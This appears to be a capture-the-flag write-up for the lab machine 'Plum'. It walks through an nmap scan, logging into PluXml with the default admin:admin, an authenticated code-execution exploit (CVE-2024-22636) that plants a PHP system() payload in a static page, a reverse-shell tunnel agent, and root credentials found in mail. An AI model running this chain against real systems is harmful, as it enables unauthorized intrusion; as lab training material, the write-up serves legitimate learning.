Plum

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 10:33 +08
Nmap scan report for 192.168.158.28
Host is up (0.0084s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

Initial Access

Port 80

We can see there is a website running on port 80.

Further searching online, we can see that this is a CMS.

When we scroll down to the bottom, we can see there is an Administration link.

Upon clicking onto it, it redirects us to a login page.

So naturally, we will try admin:admin to see if we can get in and sure enough, we got in.

CVE-2024-22636

After some enumeration, we can see this version of PluXml is vulnerable to this exploit.

Bot Request Blockedpacketstormsecurity.com

This is the instructions for the exploit.

## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml

1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001

    Payload : <?php echo system('id'); ?>

2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1

    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

So we will go to static pages first.

Then we will click on edit to edit the content of the page.

Finally, we will add this line at the end of the file.

<?php echo system('id'); ?>

Then we will click on Save this page.

When we visit the static website, we should be able to see the exploit working.

So the next thing is put in our actual payload.

Repeating whatever we did just now, it should return us a reverse shell when we visit the page.

Privilege Escalation

Upgrading Shell

First we will upgrade the shell using this: Native Linux Method

Linpeas

From the linpeas result, we can see that the users with consoles only contains root.

We also can see that port 25 is running on the target machine.

Local Port Forwarding

We will download the agent onto the target machine.

We will also start the proxy on our own kali machine

We will then start the agent on the target machine

www-data@plum:/tmp$ chmod +x ./agent
www-data@plum:/tmp$ ./agent -connect 192.168.45.192:443 -ignore-cert
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established                        addr="192.168.45.192:443"

We will then check the IP that we need to use to create the static route.

Since we create the static route when doing PC, we are going to skip that step. We will just start the tunnel.

Now when we scan, we should be able to see port 25.

Root credential in mail

From the result, we also can see that there are mails for the www-data.

Upon scrolling through, we can see the credentials for root.

To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator

We can just switch user into root to get access to the shell.

www-data@plum:/var/mail$ su root
su root
Password: 6s8kaZZNaZZYBMfh2YEW
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

PreviousPC NextPress

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagPort 80

hashtagCVE-2024-22636

hashtagPrivilege Escalation

hashtagUpgrading Shell

hashtagLinpeas

hashtagLocal Port Forwarding

hashtagRoot credential in mail